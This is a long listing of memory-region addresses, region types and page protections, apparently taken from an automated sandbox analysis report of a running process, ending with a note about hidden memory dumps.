|
||
3580000
|
trusted library allocation
|
page read and write
|
||
3703000
|
heap
|
page read and write
|
||
1E60000
|
direct allocation
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
280000
|
heap
|
page read and write
|
||
1ACE5000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
4D88000
|
heap
|
page read and write
|
||
46A000
|
heap
|
page read and write
|
||
36E4000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
7FE898C3000
|
trusted library allocation
|
page read and write
|
||
2A2F000
|
stack
|
page read and write
|
||
3703000
|
heap
|
page read and write
|
||
1A5E4000
|
heap
|
page execute and read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
373000
|
heap
|
page read and write
|
||
4E6000
|
heap
|
page read and write
|
||
1ACEF000
|
heap
|
page read and write
|
||
4FA000
|
heap
|
page read and write
|
||
1D30000
|
direct allocation
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
3AD000
|
heap
|
page read and write
|
||
517B000
|
heap
|
page read and write
|
||
2EC000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
404000
|
heap
|
page read and write
|
||
144000
|
heap
|
page read and write
|
||
1C215000
|
heap
|
page read and write
|
||
4F70000
|
trusted library allocation
|
page read and write
|
||
2FF000
|
heap
|
page read and write
|
||
4D4000
|
heap
|
page read and write
|
||
3D0000
|
heap
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
4D99000
|
heap
|
page read and write
|
||
3977000
|
heap
|
page read and write
|
||
1E40000
|
direct allocation
|
page read and write
|
||
466000
|
heap
|
page read and write
|
||
3CD0000
|
trusted library allocation
|
page read and write
|
||
3A8000
|
heap
|
page read and write
|
||
51CD000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
2130000
|
heap
|
page read and write
|
||
36DD000
|
heap
|
page read and write
|
||
472000
|
heap
|
page read and write
|
||
439000
|
heap
|
page read and write
|
||
28D5000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
3AAC000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
32F2000
|
trusted library allocation
|
page read and write
|
||
318E000
|
stack
|
page read and write
|
||
2154000
|
heap
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
3AAD000
|
heap
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
4D94000
|
heap
|
page read and write
|
||
379000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
4F56000
|
trusted library allocation
|
page read and write
|
||
1E20000
|
direct allocation
|
page read and write
|
||
50C1000
|
heap
|
page read and write
|
||
1C30F000
|
stack
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
3260000
|
remote allocation
|
page read and write
|
||
22F000
|
heap
|
page read and write
|
||
2D9000
|
heap
|
page read and write
|
||
5E0F000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
32D3000
|
trusted library allocation
|
page read and write
|
||
5720000
|
trusted library allocation
|
page read and write
|
||
3B7B000
|
heap
|
page read and write
|
||
1F00000
|
direct allocation
|
page read and write
|
||
1FE3000
|
heap
|
page read and write
|
||
1AEBB000
|
stack
|
page read and write
|
||
5186000
|
heap
|
page read and write
|
||
5532000
|
heap
|
page read and write
|
||
19F20000
|
trusted library allocation
|
page read and write
|
||
32EE000
|
trusted library allocation
|
page read and write
|
||
319D000
|
trusted library allocation
|
page read and write
|
||
40B000
|
heap
|
page read and write
|
||
3B69000
|
heap
|
page read and write
|
||
5468000
|
heap
|
page read and write
|
||
1C04B000
|
heap
|
page read and write
|
||
377000
|
heap
|
page read and write
|
||
1B65D000
|
stack
|
page read and write
|
||
53BC000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
27DE000
|
stack
|
page read and write
|
||
3A4F000
|
heap
|
page read and write
|
||
499000
|
heap
|
page read and write
|
||
53B4000
|
heap
|
page read and write
|
||
3C70000
|
trusted library allocation
|
page read and write
|
||
515C000
|
heap
|
page read and write
|
||
1B216000
|
heap
|
page read and write
|
||
4D54000
|
heap
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
3B77000
|
heap
|
page read and write
|
||
3ACD000
|
heap
|
page read and write
|
||
546000
|
heap
|
page read and write
|
||
1BA4000
|
heap
|
page read and write
|
||
2C8000
|
stack
|
page read and write
|
||
4FA000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
33A000
|
heap
|
page read and write
|
||
37E000
|
stack
|
page read and write
|
||
55C2000
|
heap
|
page read and write
|
||
196000
|
heap
|
page read and write
|
||
2E0000
|
heap
|
page read and write
|
||
3840000
|
heap
|
page read and write
|
||
1F20000
|
direct allocation
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
51D000
|
heap
|
page read and write
|
||
413000
|
heap
|
page read and write
|
||
2B9F000
|
stack
|
page read and write
|
||
1CED000
|
direct allocation
|
page read and write
|
||
5770000
|
trusted library allocation
|
page read and write
|
||
1A5E8000
|
heap
|
page execute and read and write
|
||
4D10000
|
heap
|
page read and write
|
||
27C000
|
heap
|
page read and write
|
||
367000
|
heap
|
page read and write
|
||
584000
|
heap
|
page read and write
|
||
551000
|
heap
|
page read and write
|
||
A3000
|
stack
|
page read and write
|
||
4AA000
|
heap
|
page read and write
|
||
271E000
|
trusted library allocation
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
1B80000
|
trusted library allocation
|
page read and write
|
||
4E0F000
|
heap
|
page read and write
|
||
42B000
|
heap
|
page read and write
|
||
1ACDD000
|
heap
|
page read and write
|
||
4E0F000
|
heap
|
page read and write
|
||
51DA000
|
heap
|
page read and write
|
||
371C000
|
heap
|
page read and write
|
||
55BC000
|
heap
|
page read and write
|
||
17E000
|
heap
|
page read and write
|
||
1CD3000
|
direct allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
2716000
|
trusted library allocation
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
4BB000
|
heap
|
page read and write
|
||
184000
|
heap
|
page read and write
|
||
5C4F000
|
heap
|
page read and write
|
||
3AE000
|
heap
|
page read and write
|
||
1ED0000
|
heap
|
page read and write
|
||
3B8B000
|
heap
|
page read and write
|
||
412000
|
heap
|
page read and write
|
||
1AC9F000
|
stack
|
page read and write
|
||
22C0000
|
heap
|
page execute and read and write
|
||
6D56000
|
trusted library allocation
|
page read and write
|
||
1C2000
|
stack
|
page read and write
|
||
277F000
|
stack
|
page read and write
|
||
3B8F000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
7FE898B2000
|
trusted library allocation
|
page read and write
|
||
374000
|
heap
|
page read and write
|
||
569C000
|
heap
|
page read and write
|
||
533000
|
heap
|
page read and write
|
||
3AF000
|
heap
|
page read and write
|
||
36D9000
|
heap
|
page read and write
|
||
57F000
|
trusted library allocation
|
page read and write
|
||
1DE0000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
415000
|
heap
|
page read and write
|
||
36F4000
|
heap
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
3B00000
|
trusted library allocation
|
page read and write
|
||
429000
|
heap
|
page read and write
|
||
4D5F000
|
heap
|
page read and write
|
||
55F000
|
heap
|
page read and write
|
||
1CD0000
|
direct allocation
|
page read and write
|
||
3B8A000
|
heap
|
page read and write
|
||
1ACEA000
|
heap
|
page read and write
|
||
368000
|
heap
|
page read and write
|
||
398000
|
heap
|
page read and write
|
||
36E4000
|
heap
|
page read and write
|
||
442000
|
heap
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
1D60000
|
heap
|
page read and write
|
||
6D56000
|
trusted library allocation
|
page read and write
|
||
1A8F9000
|
stack
|
page read and write
|
||
425F000
|
stack
|
page read and write
|
||
53B4000
|
heap
|
page read and write
|
||
3B2000
|
heap
|
page read and write
|
||
327B000
|
trusted library allocation
|
page read and write
|
||
371F000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
4D56000
|
heap
|
page read and write
|
||
22AE000
|
stack
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
5651000
|
heap
|
page read and write
|
||
1F14000
|
heap
|
page read and write
|
||
4F4000
|
heap
|
page read and write
|
||
3F2E000
|
stack
|
page read and write
|
||
53E8000
|
heap
|
page read and write
|
||
467000
|
heap
|
page read and write
|
||
9F56000
|
trusted library allocation
|
page read and write
|
||
569C000
|
heap
|
page read and write
|
||
4A7000
|
heap
|
page read and write
|
||
3620000
|
heap
|
page read and write
|
||
5392000
|
heap
|
page read and write
|
||
1BC6000
|
heap
|
page read and write
|
||
5870000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
1DDB000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
1F10000
|
heap
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
1CC0000
|
direct allocation
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
5DC9000
|
heap
|
page read and write
|
||
1CAEE000
|
stack
|
page read and write
|
||
5CDD000
|
heap
|
page read and write
|
||
5C72000
|
heap
|
page read and write
|
||
5666000
|
heap
|
page read and write
|
||
3C6000
|
heap
|
page read and write
|
||
514000
|
heap
|
page read and write
|
||
327D000
|
trusted library allocation
|
page read and write
|
||
1A6CF000
|
stack
|
page read and write
|
||
4D0000
|
heap
|
page read and write
|
||
3B3000
|
heap
|
page read and write
|
||
17E000
|
heap
|
page read and write
|
||
1C770000
|
heap
|
page read and write
|
||
5CAD000
|
heap
|
page read and write
|
||
3B8A000
|
heap
|
page read and write
|
||
36FB000
|
heap
|
page read and write
|
||
1EA7000
|
direct allocation
|
page read and write
|
||
565C000
|
heap
|
page read and write
|
||
474000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
32D3000
|
trusted library allocation
|
page read and write
|
||
32A0000
|
trusted library allocation
|
page read and write
|
||
4E5D000
|
heap
|
page read and write
|
||
1E16000
|
heap
|
page read and write
|
||
5663000
|
heap
|
page read and write
|
||
569C000
|
heap
|
page read and write
|
||
55C0000
|
heap
|
page read and write
|
||
3AA0000
|
heap
|
page read and write
|
||
522000
|
heap
|
page read and write
|
||
3820000
|
trusted library allocation
|
page read and write
|
||
47E000
|
heap
|
page read and write
|
||
A7000
|
heap
|
page read and write
|
||
2BEF000
|
stack
|
page read and write
|
||
7FE898CB000
|
trusted library allocation
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
4E01000
|
heap
|
page read and write
|
||
473000
|
system
|
page execute and read and write
|
||
3A0000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
374000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
23FF000
|
stack
|
page read and write
|
||
32F7000
|
trusted library allocation
|
page read and write
|
||
5640000
|
heap
|
page read and write
|
||
4F9000
|
heap
|
page read and write
|
||
4D92000
|
heap
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
331000
|
heap
|
page read and write
|
||
5060000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
F5000
|
stack
|
page read and write
|
||
4E06000
|
heap
|
page read and write
|
||
459000
|
system
|
page execute and read and write
|
||
566E000
|
heap
|
page read and write
|
||
580000
|
heap
|
page read and write
|
||
2840000
|
trusted library allocation
|
page execute read
|
||
51BD000
|
heap
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
1B296000
|
heap
|
page read and write
|
||
12091000
|
trusted library allocation
|
page read and write
|
||
31A2000
|
trusted library allocation
|
page read and write
|
||
3B77000
|
heap
|
page read and write
|
||
27B0000
|
heap
|
page read and write
|
||
3986000
|
heap
|
page read and write
|
||
6356000
|
trusted library allocation
|
page read and write
|
||
3C6000
|
heap
|
page read and write
|
||
1CDF000
|
direct allocation
|
page read and write
|
||
36FA000
|
heap
|
page read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
556F000
|
heap
|
page read and write
|
||
3B8A000
|
heap
|
page read and write
|
||
1B460000
|
heap
|
page read and write
|
||
51D6000
|
heap
|
page read and write
|
||
5D00000
|
heap
|
page read and write
|
||
411000
|
heap
|
page read and write
|
||
1CE4000
|
heap
|
page read and write
|
||
132000
|
heap
|
page read and write
|
||
37B0000
|
trusted library allocation
|
page read and write
|
||
293F000
|
stack
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
4D58000
|
heap
|
page read and write
|
||
408000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
4D95000
|
heap
|
page read and write
|
||
5940000
|
trusted library allocation
|
page read and write
|
||
40B000
|
heap
|
page read and write
|
||
4D99000
|
heap
|
page read and write
|
||
1A9E5000
|
stack
|
page read and write
|
||
4EF000
|
heap
|
page read and write
|
||
264E000
|
stack
|
page read and write
|
||
566C000
|
heap
|
page read and write
|
||
53B6000
|
heap
|
page read and write
|
||
51D6000
|
heap
|
page read and write
|
||
3DE000
|
heap
|
page read and write
|
||
2E4000
|
heap
|
page read and write
|
||
48A000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
3B93000
|
heap
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
378000
|
heap
|
page read and write
|
||
3B66000
|
heap
|
page read and write
|
||
517B000
|
heap
|
page read and write
|
||
36EA000
|
heap
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
54ED000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
3447000
|
direct allocation
|
page read and write
|
||
50CE000
|
heap
|
page read and write
|
||
55CF000
|
heap
|
page read and write
|
||
2717000
|
trusted library allocation
|
page read and write
|
||
3876000
|
heap
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
2600000
|
trusted library allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
5DF8000
|
heap
|
page read and write
|
||
45D000
|
system
|
page execute and read and write
|
||
2F9000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3B66000
|
heap
|
page read and write
|
||
3A7000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
55CE000
|
heap
|
page read and write
|
||
55CE000
|
heap
|
page read and write
|
||
1D20000
|
heap
|
page read and write
|
||
5666000
|
heap
|
page read and write
|
||
5674000
|
heap
|
page read and write
|
||
8156000
|
trusted library allocation
|
page read and write
|
||
2FD000
|
heap
|
page read and write
|
||
270A000
|
trusted library allocation
|
page read and write
|
||
4DC000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
26A000
|
heap
|
page read and write
|
||
140000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
1B1C9000
|
heap
|
page read and write
|
||
400000
|
system
|
page execute and read and write
|
||
120000
|
heap
|
page read and write
|
||
7FE89A30000
|
trusted library allocation
|
page read and write
|
||
3A4000
|
stack
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
3A4F000
|
heap
|
page read and write
|
||
3A00000
|
heap
|
page read and write
|
||
1AFB4000
|
heap
|
page read and write
|
||
3E2000
|
heap
|
page read and write
|
||
543000
|
heap
|
page read and write
|
||
50BE000
|
heap
|
page read and write
|
||
43AD000
|
trusted library allocation
|
page read and write
|
||
4D97000
|
heap
|
page read and write
|
||
3EF000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
3193000
|
trusted library allocation
|
page read and write
|
||
1B34B000
|
stack
|
page read and write
|
||
7FE89A92000
|
trusted library allocation
|
page read and write
|
||
23F000
|
heap
|
page read and write
|
||
49D000
|
heap
|
page read and write
|
||
3B93000
|
heap
|
page read and write
|
||
267F000
|
stack
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
F2000
|
stack
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
17E000
|
heap
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
41B000
|
heap
|
page read and write
|
||
50BE000
|
heap
|
page read and write
|
||
7FE898BD000
|
trusted library allocation
|
page execute and read and write
|
||
7FE8994C000
|
trusted library allocation
|
page execute and read and write
|
||
36F4000
|
heap
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
2C7F000
|
stack
|
page read and write
|
||
54ED000
|
heap
|
page read and write
|
||
2E74000
|
trusted library allocation
|
page read and write
|
||
414000
|
heap
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
1ACA0000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
31A2000
|
trusted library allocation
|
page read and write
|
||
464000
|
heap
|
page read and write
|
||
50BF000
|
heap
|
page read and write
|
||
54ED000
|
heap
|
page read and write
|
||
AEC000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
3B21000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
386000
|
stack
|
page read and write
|
||
53AB000
|
heap
|
page read and write
|
||
4D97000
|
heap
|
page read and write
|
||
108000
|
heap
|
page read and write
|
||
36E0000
|
heap
|
page read and write
|
||
319D000
|
trusted library allocation
|
page read and write
|
||
220000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
55CC000
|
heap
|
page read and write
|
||
397D000
|
heap
|
page read and write
|
||
515A000
|
heap
|
page read and write
|
||
5849000
|
trusted library allocation
|
page read and write
|
||
3191000
|
trusted library allocation
|
page read and write
|
||
1CF0000
|
direct allocation
|
page read and write
|
||
140000
|
heap
|
page read and write
|
||
2940000
|
trusted library allocation
|
page execute read
|
||
1B71C000
|
stack
|
page read and write
|
||
37B000
|
heap
|
page read and write
|
||
475000
|
heap
|
page read and write
|
||
1DD4000
|
heap
|
page read and write
|
||
3B7B000
|
heap
|
page read and write
|
||
3CE000
|
heap
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
3BC0000
|
trusted library allocation
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
1C29E000
|
heap
|
page read and write
|
||
515A000
|
heap
|
page read and write
|
||
216000
|
stack
|
page read and write
|
||
3B66000
|
heap
|
page read and write
|
||
4EFD000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
1AF0E000
|
stack
|
page read and write
|
||
411000
|
heap
|
page read and write
|
||
7FE899B0000
|
trusted library allocation
|
page execute and read and write
|
||
4D51000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
36B6000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
3282000
|
trusted library allocation
|
page read and write
|
||
2FDB000
|
stack
|
page read and write
|
||
5570000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
54AA000
|
heap
|
page read and write
|
||
3B66000
|
heap
|
page read and write
|
||
28FF000
|
stack
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
5694000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
31A2000
|
trusted library allocation
|
page read and write
|
||
3703000
|
heap
|
page read and write
|
||
350000
|
direct allocation
|
page read and write
|
||
327D000
|
trusted library allocation
|
page read and write
|
||
32EF000
|
trusted library allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
1B84000
|
heap
|
page read and write
|
||
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
3420000
|
direct allocation
|
page read and write
|
||
4E06000
|
heap
|
page read and write
|
||
1A7CB000
|
stack
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
469000
|
heap
|
page read and write
|
||
2C3F000
|
stack
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
7FE89A94000
|
trusted library allocation
|
page read and write
|
||
54EC000
|
heap
|
page read and write
|
||
238000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
39F4000
|
heap
|
page read and write
|
||
3282000
|
trusted library allocation
|
page read and write
|
||
1AF6F000
|
stack
|
page read and write
|
||
385B000
|
trusted library allocation
|
page read and write
|
||
24AE000
|
stack
|
page read and write
|
||
55BE000
|
heap
|
page read and write
|
||
2F7000
|
heap
|
page read and write
|
||
32FD000
|
trusted library allocation
|
page read and write
|
||
36C5000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
39F000
|
stack
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
564A000
|
heap
|
page read and write
|
||
32A3000
|
trusted library allocation
|
page read and write
|
||
4D64000
|
heap
|
page read and write
|
||
5186000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
5651000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
1F98000
|
heap
|
page read and write
|
||
583E000
|
trusted library allocation
|
page read and write
|
||
256F000
|
stack
|
page read and write
|
||
6356000
|
trusted library allocation
|
page read and write
|
||
DE000
|
heap
|
page read and write
|
||
288000
|
heap
|
page read and write
|
||
5C2C000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
436000
|
heap
|
page read and write
|
||
1CBAE000
|
stack
|
page read and write
|
||
566C000
|
heap
|
page read and write
|
||
400A000
|
stack
|
page read and write
|
||
208000
|
stack
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
3B8D000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
5D0C000
|
heap
|
page read and write
|
||
29CB000
|
heap
|
page read and write
|
||
4A0000
|
heap
|
page read and write
|
||
569000
|
heap
|
page read and write
|
||
395B000
|
stack
|
page read and write
|
||
515A000
|
heap
|
page read and write
|
||
3BBD000
|
stack
|
page read and write
|
||
1B90000
|
heap
|
page read and write
|
||
4E01000
|
heap
|
page read and write
|
||
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
4BB000
|
heap
|
page read and write
|
||
2756000
|
trusted library allocation
|
page read and write
|
||
36B2000
|
heap
|
page read and write
|
||
5E85000
|
heap
|
page read and write
|
||
3370000
|
trusted library allocation
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
54F0000
|
heap
|
page read and write
|
||
7FE89970000
|
trusted library allocation
|
page execute and read and write
|
||
371F000
|
heap
|
page read and write
|
||
4E0E000
|
heap
|
page read and write
|
||
3279000
|
trusted library allocation
|
page read and write
|
||
45C000
|
system
|
page execute and read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
517B000
|
heap
|
page read and write
|
||
1C64A000
|
stack
|
page read and write
|
||
26F1000
|
trusted library allocation
|
page read and write
|
||
1F10000
|
heap
|
page read and write
|
||
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
5C37000
|
heap
|
page read and write
|
||
3683000
|
heap
|
page read and write
|
||
51DB000
|
heap
|
page read and write
|
||
50DC000
|
heap
|
page read and write
|
||
41A000
|
heap
|
page read and write
|
||
3B93000
|
heap
|
page read and write
|
||
3700000
|
trusted library allocation
|
page read and write
|
||
7FE89976000
|
trusted library allocation
|
page execute and read and write
|
||
3F0000
|
heap
|
page read and write
|
||
536A000
|
heap
|
page read and write
|
||
2F9000
|
heap
|
page read and write
|
||
5CB9000
|
heap
|
page read and write
|
||
428E000
|
trusted library allocation
|
page read and write
|
||
3BC0000
|
trusted library allocation
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
3B93000
|
heap
|
page read and write
|
||
11F21000
|
trusted library allocation
|
page read and write
|
||
3633000
|
heap
|
page read and write
|
||
3B62000
|
heap
|
page read and write
|
||
55C2000
|
heap
|
page read and write
|
||
319D000
|
trusted library allocation
|
page read and write
|
||
51C2000
|
heap
|
page read and write
|
||
44D000
|
heap
|
page read and write
|
||
34F0000
|
heap
|
page read and write
|
||
3453000
|
direct allocation
|
page read and write
|
||
5854000
|
trusted library allocation
|
page read and write
|
||
46E000
|
stack
|
page read and write
|
||
3810000
|
heap
|
page read and write
|
||
566C000
|
heap
|
page read and write
|
||
1DBE000
|
stack
|
page read and write | page guard
|
||
3B63000
|
heap
|
page read and write
|
||
54AE000
|
heap
|
page read and write
|
||
7FE89A80000
|
trusted library allocation
|
page execute and read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
38B0000
|
heap
|
page read and write
|
||
3A47000
|
heap
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
7FE89A94000
|
trusted library allocation
|
page read and write
|
||
1BE6000
|
heap
|
page read and write
|
||
3858000
|
trusted library allocation
|
page read and write
|
||
51D9000
|
heap
|
page read and write
|
||
32E8000
|
trusted library allocation
|
page read and write
|
||
43A1000
|
trusted library allocation
|
page read and write
|
||
4FA000
|
heap
|
page read and write
|
||
189000
|
heap
|
page read and write
|
||
1AFF6000
|
heap
|
page read and write
|
||
1C17E000
|
stack
|
page read and write
|
||
370000
|
heap
|
page read and write
|
||
4E0000
|
heap
|
page read and write
|
||
3ADA000
|
heap
|
page read and write
|
||
867000
|
heap
|
page read and write
|
||
2133000
|
heap
|
page read and write
|
||
36EA000
|
heap
|
page read and write
|
||
5666000
|
heap
|
page read and write
|
||
4F10000
|
trusted library allocation
|
page read and write
|
||
3199000
|
trusted library allocation
|
page read and write
|
||
36B6000
|
heap
|
page read and write
|
||
1C0DF000
|
stack
|
page read and write
|
||
55BC000
|
heap
|
page read and write
|
||
51D5000
|
heap
|
page read and write
|
||
3C3000
|
heap
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
4E0E000
|
heap
|
page read and write
|
||
3B7F000
|
heap
|
page read and write
|
||
40EE000
|
trusted library allocation
|
page read and write
|
||
3277000
|
trusted library allocation
|
page read and write
|
||
329F000
|
trusted library allocation
|
page read and write
|
||
3B69000
|
heap
|
page read and write
|
||
2731000
|
trusted library allocation
|
page read and write
|
||
1F40000
|
direct allocation
|
page read and write
|
||
1C210000
|
heap
|
page read and write
|
||
32FA000
|
trusted library allocation
|
page read and write
|
||
581E000
|
trusted library allocation
|
page read and write
|
||
7FE89950000
|
trusted library allocation
|
page execute and read and write
|
||
5041000
|
heap
|
page read and write
|
||
1B1A5000
|
heap
|
page read and write
|
||
2A9F000
|
stack
|
page read and write
|
||
3705000
|
heap
|
page read and write
|
||
4E63000
|
heap
|
page read and write
|
||
50DA000
|
heap
|
page read and write
|
||
515C000
|
heap
|
page read and write
|
||
3CCB000
|
stack
|
page read and write
|
||
12C000
|
heap
|
page read and write
|
||
5661000
|
heap
|
page read and write
|
||
33F000
|
heap
|
page read and write
|
||
36EA000
|
heap
|
page read and write
|
||
507000
|
heap
|
page read and write
|
||
3B56000
|
trusted library allocation
|
page read and write
|
||
1E40000
|
heap
|
page read and write
|
There are 2091 hidden memdumps, click here to show them.